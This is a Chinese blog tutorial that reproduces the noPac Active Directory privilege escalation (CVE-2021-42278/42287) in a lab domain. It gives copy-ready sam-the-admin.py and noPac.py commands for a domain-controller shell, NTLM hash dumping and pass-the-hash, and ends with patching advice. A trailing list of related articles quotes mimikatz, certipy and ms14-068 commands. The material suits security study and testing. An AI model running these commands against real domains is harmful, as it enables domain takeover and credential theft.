域内提权 (CVE-2021-42278 & CVE-2021-42287) 漏洞利用

已于 2022-08-06 16:11:27 修改
阅读量3.1k 收藏 5
点赞数
分类专栏: 漏洞利用 文章标签: 网络安全 漏洞利用
于 2022-07-03 22:26:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/captain_rb/article/details/125569452
版权
本文详细介绍了Windows AD域的两个高危漏洞CVE-2021-42278和CVE-2021-42287,这两个漏洞可能导致域内用户提升至域管理员权限。内容包括漏洞介绍、受影响系统版本、实验环境、漏洞利用方法(如sam-the-admin.py和noPac.py工具)以及漏洞修复建议。
摘要由CSDN通过智能技术生成

2021年11月,Microsoft 曝出了两个关于 Windows AD 域提权的漏洞:CVE-2021-42278 & CVE-2021-42287,CVSS V3.1评分均为8.8,两个漏洞组合可导致域内普通用户提升至域管权限。

文章目录

一、漏洞介绍

CVE-2021-42278利用AD域计算机账户认证漏洞,使用计算机账户的sAMAccountName冒充域控制器,结合CVE-2021-42287可以获取Kerberos特权属性证书 (PAC),从而使域内普通用户权限提升至域管理员权限。

影响系统版本:
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server, version 20H2 (Server Core Installation)
Windows Server, version 2004 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows Server 2022 (Server Core installation)

二、漏洞利用

实验环境
域控制器及域信息:
OS: Microsoft Windows Server 2016 Datacenter
Hostname: DC01
IP: 192.168.43.100
Domain: main.test.com
NetBIOS Domain Name: MAIN

已知域用户: testuser,密码: p@55word

攻击机不在域内,但能访问域控
工具和指令均在攻击机上操作

很多工具都可以对 CVE-2021-42278 & CVE-2021-42287 进行利用,这里介绍两种自动化脚本:

(一) sam-the-admin.py

工具链接:https://github.com/WazeHell/sam-the-admin

注意:该脚本只能在Kali环境中运行

工具使用前先安装依赖包:pip3 install -r requirements.txt

获取Shell
python3 sam_the_admin.py "main/testuser:p@55word" -dc-ip 192.168.43.100 -shell

运行结果如下:
请添加图片描述
注意获取shell是通过impacket包中的smbexec.py,获取HASH是通过impacket包中的secretsdump.py,在sam-the-admin.py中有如下定义:

fbinary = "/usr/bin/impacket-smbexec"
if options.dump:
    fbinary = "/usr/bin/impacket-secretsdump"

其中smbexec.py的路径是/usr/bin/impacket-smbexec,secretsdump.py的路径是/usr/bin/impacket-secretsdump,如果系统环境中这两个脚本不是此路径,则需要将其调用路径进行修改。

另外,虽然sam-the-admin.py帮助文档中有提到获取HASH和HASH传递认证方式,但是测试中都没有执行成功。

(二) noPac.py

在sam-the-admin.py的基础上改进,工具链接:https://github.com/Ridter/noPac

工具使用前先安装依赖包:pip3 install -r requirements.txt

获取Shell
python3 noPac.py -use-ldap main.test.com/testuser:p@55word -dc-ip 192.168.43.100 -shell

运行结果如下:
请添加图片描述
注意log信息中提示Current ms-DS-MachineAccountQuota = 10,表示普通用户新建计算机账户上限为10 (10是默认值,如果修改为0则表示无法新建计算机账户,漏洞利用会失败),工具运行后会尝试将执行过程中新建的计算机账户删掉,但是只有域管权限才可以成功删除,因此在使用普通域用户权限时,每执行一次都会新建一个计算机账户,当数量达到上限10,漏洞利用会失败。

获取HASH
python3 noPac.py -use-ldap main.test.com/testuser:p@55word -dc-ip 192.168.43.100 -dump -just-dc-ntlm

运行结果如下:
请添加图片描述
认证方式支持HASH传递,如:

python3 noPac.py -use-ldap main.test.com/testuser -hashes :52888cf384b8d2e56e0cc2bb6b906f99 -dc-ip 192.168.43.100 -dump -just-dc-ntlm

三、漏洞修复

参考Microsoft安全更新程序指南:CVE-2021-42278CVE-2021-42287,域控上安装相应补丁即可,成员机不需要。

Captain_RB
关注
专栏目录
Active Directory 服务权限提升漏洞(CVE-2022-26923)
做自己喜欢的事,并将其发挥到极致!
05-17 2845
文章目录声明一、漏洞描述二、影响范围三、Windows Active Directory (AD)四、Active Directory 证书服务五、环境配置六、漏洞复现七、修复方案八、参考链接 声明 本文章仅用于技术学习、安全研究。切勿用于非授权下渗透攻击行为,切记! 一、漏洞描述 Active Directory 权限提升漏洞 (CVE-2022-26923)允许低权限用户在安装了 Active Directory 证书服务 (AD CS) 服务器角色的默认 Active Directory 环境中
Exchange SSRF 提权漏洞复现(CVE-2018-8581)
谢公子的博客
07-01 4013
漏洞描述 Exchange Server于2018年11月份被爆出存在SSRF漏洞,可以伪造任意用户。但在之后又被爆出另外一种攻击方式,可以使用任意内用户通过NTML Relay来接管控!攻击者仅需要拥有一个普通内用户权限即可对存在漏洞的Exchange服务器发起攻击,进而接管控。 漏洞影响版本 Exchange 2010 ~ Exchange 2016 漏洞过程 Exchange允许任何用户为推送订阅指定所需的URL,服务器将尝试向这个URL发送通知。问题出在Excha...
CVE-2021-42278 & CVE-2021-42287提权漏洞
内心不种满鲜花就会长满杂草
02-17 2832
2021 年 11 月 9 日,国外研究员在推特上发布了AD相关的 CVECVE-2021-42278 & CVE-2021-42287 ,两个漏洞组合可导致内普通用户权限提升至管权限。是一个安全绕过漏洞,允许通过修改机器账户的sAMAccountName属性来冒充控制器。与标准用户相比,机器账户的名字以$结尾,但AD并没有验证内机器账户中是否有$,导致机器账户可以被假冒。是影响Kerberos特权属性证书(PAC)的安全绕过漏洞,允许通过假冒控制器,使密钥分发中心KDC创建高权限票据。
第106天:权限提升-WIN 系统&AD控&NetLogon&ADCS&PAC&KDC&CVE 漏洞
最新发布
weixin_71529930的博客
06-21 860
certipy req 'ip/用户名:密码@控计算机名' -target-ip 控ip -ca abc-DC1-CA -template User -debug。python3 sam_the_admin.py 名/'控主机账号:密码' -dc-ip 控ip -shell。ms14-068.exe -u 成员名@名 -p 成员密码 -s 成员sid -d 控制器地址。只要攻击者能访问到目标控井且知道控计算机名即可利用该漏洞。查看ip已经变成了控机的ip。
CVE-2020-1472提权漏洞复现
whojoe的博客
07-08 893
CVE-2020-1472提权漏洞复现环境漏洞复现mimikatz查看原本hashpoc重置密码获取密码恢复密码查看恢复的密码python重置密码获取管密码1获取控机器密码1获取控机器密码2恢复控密码查看恢复的密码参考文章 环境 ad 192.168.164.129 user 192.168.164.133 kali 192.168.164.x 漏洞复现 mimikatz 查看原本hash mimikatz.exe "privilege::debug" "sekurlsa::logonpassw
内网渗透:八、CVE-2020-1472 NetLogon 提权漏洞(控密码置空)
liu_jia_liang的博客
03-08 5225
简介: 2020年8月11号,微软修复了Netlogon 特权提升漏洞,2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来。该漏洞也称为“Zerologon”,CVSS评分为10.0,号称3秒撸控,危害严重。攻击者在通过NetLogon(MS-NRPC)协议与AD控建立安全通道时,可利用该漏洞将AD控的计算机账号密码置为空,从而控制控服务器。 Netlogon远程协议是一个可用的在Windows控制器上的RPC(remote pr...
CVE-2021-42278内权限提升
include_voidmain的博客
03-16 4995
0x01 漏洞背景 前些日子的靶场中涉及到了提权,当时刚好爆出CVE-2022-42278这个提权漏洞,正好下载下来了POC试了试,确实不错,于是打算看看这个只需一个用户,就能获取控权限的漏洞怎么回事,便有了这篇文章。 0x02 环境搭建 在这里搭建了一个简单的内网环境,主机AD_USER将445端口暴露在外,并且存在ms17_010,hacker通过AD_USER的445端口进入内,随后通过CVE-2021-42287拿下AD。 环境详情: 主机IP Hacker192.168.80.12
控漏洞-CVE-2021-42287&42278复现
君行路的博客
12-16 1万+
文章目录环境介绍sam-the-admin python利用脚本noPac利用脚本利用流程1. 查询MAQ值2. 普通用户创建机器账户并清除SPN3. 重设机器名称4. 为机器账户请求TGT5. 再次更改机器账户的sAMAccountName6. 通过S4U2self协议向DC请求TGS票据参考链接 微信公众号:信安文摘 环境介绍 :god.org windows 7 192.168.52.143 机器名称:stu1 内普通用户:liukaifeng01:hongrisec@2021@ wind
【安全漏洞】CVE-2021-42287&CVE-2021-42278 提权
HBohan的博客
12-25 2520
网络安全技术学习,承认⾃⼰的弱点不是丑事。只有对原理了然于⼼,才能突破更多的限制。拥有快速学习能力的白帽子,是不能有短板的,有的只能是大量的标准板和几块长板。知识⾯,决定看到的攻击⾯有多⼴;知识链,决定发动的杀伤链有多深。
CVE-2021-1675 Windows Print Spooler 提权漏洞记录
small_cat's home
12-19 238
记录CVE-2021-1675的复现过程
内网渗透(七十九)之 CVE-2021-42287 权限提升漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-20 902
这个漏洞的产生核心的原因是KDC在处理UserName字段时的问题,而后结合两种攻击链针对内和跨进行攻击。当针对内攻击时,结合了CVE-2021-42278漏洞来修改机器⽤户的saMAccountName属性,让KDC找不到⽤户,⾛进处理UserName的逻辑。然后再利⽤KDC在处理S4U2Self时的逻辑问题(不校验发起S4U2Self请求的⽤户是否具有权限发起S4U2Self请求)以及重新⽣成PAC的这⼀特性来进⾏攻击。当针对跨攻击时,其实意义不⼤。
ms17010漏洞利用_CVE20201472提权漏洞
weixin_35039018的博客
01-23 1494
0x01 漏洞说明CVE-2020-1472是继MS17010之后一个比较好用的内网提权漏洞,影响Windows Server 2008R 2至Windows Server 2019的多个版本系统,只要攻击者能访问到目标控并且知道控计算机名即可利用该漏洞.该漏洞不要求当前计算机在内,也不要求当前计算机操作系统为windows,该漏洞的稳定利用方式为重置目标控的密码, 然后利用城控...
Windows提权漏洞CVE-2021-442287
qq_53579360的博客
11-25 913
Windows提权漏洞CVE-2021-442287
CVE-2020-1472提权漏洞】
xhwfa的博客
03-15 3943
一、漏洞简介 2020年8月11号,微软修复了Netlogon特权提升漏洞,2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来。该漏洞也称为“Zerologon”,CVSS评分为10.0,号称3秒撸控,危害严重。攻击者在通过NetLogon(MS-NRPC)协议与AD控建立安全通道时,可利用该漏洞将AD控的计算机账号密码置为空,从而控制控服务器。 二、漏洞环境搭建 控:windows server 2008 R2,IP:192.168.16
CVE-2022-26923提权漏洞
m0_46377671的博客
05-24 3162
CVE-2022-26923提权漏洞 参考链接: http://www.ctfiot.com/40081.html https://tryhackme.com/room/cve202226923 https://www.bilibili.com/video/BV1hL4y1F79y?spm_id_from=333.337.search-card.all.click 1.漏洞背景 Windows Active Directory (AD) 不仅用于身份和访问管理,还提供大量服务来帮助您运行和管理您的组织,其
cve-2022-26923复现——提权漏洞复现
m0_46317063的博客
04-23 787
cve-2022-26923提权漏洞复现
提权CVE-2021-42278漏洞复现
一只爱吃橙子的羊
11-21 1316
提权CVE-2021-42278漏洞复现,本文仅为验证漏洞,在本地环境测试验证,无其它目的。
Windows服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278
热门推荐
chaojixiaojingang
12-22 1万+
1.漏洞描述 Windows服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)是由于Active Directory 服务没有进行适当的安全限制,导致可绕过安全限制进行权限提升。攻击者可利用该漏洞造成将内的普通用户权限提升到管理员权限等危害。 2.影响版本 CVE-2021-42287: Windows Server 2012 R2 (Server Core installation) Windows Server 2012 R2 Windows Serve
MS14_068提权漏洞复现
ninnjnjn的博客
04-02 722
MS14_068提权漏洞复现 1.漏洞说明 该漏洞可能允许攻击者将未授权的用户账户的权限,提权管理员的权限 2.漏洞原理 3.漏洞利用前提 (1)控主机没有打MS14_068的补丁 (2)攻击者拿下了一台内主机的普通计算机,并获得普通用户名以及密码/hash值,和用户的suid 4.实验环境 控主机windows 2008R2 192.168.164.55 内主机windows ...
Windows环境漏洞CVE-2022-26923:权限提升与防范策略
1. 信息搜集:攻击者通过 LDAP (轻量级目录访问协议) 获取目标内的信息,进行 SPN (服务_principal_name) 扫描,以了解用户权限情况。 2. 权限提升:通过多种方式试图提升权限,如利用脆弱的服务、DACL( ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值